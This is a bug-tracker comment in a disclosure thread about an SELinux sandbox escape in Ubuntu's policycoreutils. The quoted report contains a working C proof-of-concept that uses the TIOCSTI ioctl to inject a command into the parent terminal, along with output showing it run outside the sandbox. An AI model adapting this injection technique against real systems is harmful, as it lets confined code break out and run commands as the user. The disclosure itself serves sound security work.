Comment 2 for bug 1626706

Citando "Seth Arnold" <email address hidden>:

> Hello Federico, thanks for the report; is this issue known upstream yet?
> If not, can you please report it to them? Once known, can you please add
> a link to their bug report here?

Reported the issue just now to upstream.

> policycoreutils is in universe, which means it is community-supported.
> Would you be in a position to prepare and test fixes once fixes are
> available from upstream?
>
> Thanks

Yes, i'll be glad to. Also, the 'runcon' utility is vulnerable.

> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1626706
>
> Title:
> SELinux sandbox escape via TIOCSTI ioctl
>
> Status in policycoreutils package in Ubuntu:
> New
>
> Bug description:
> Hi,
>
> When executing a program via the SELinux sandbox, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> escape the sandbox.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
>
> $ gcc test.c -o test
> $ /bin/sandbox ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
> $ id <------ did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
>
> This is similar to CVE-2016-2568, CVE-2016-2779, etc.
>
> Thanks,
> Federico Bento.
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/policycoreutils/+bug/1626706/+subscriptions
>

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.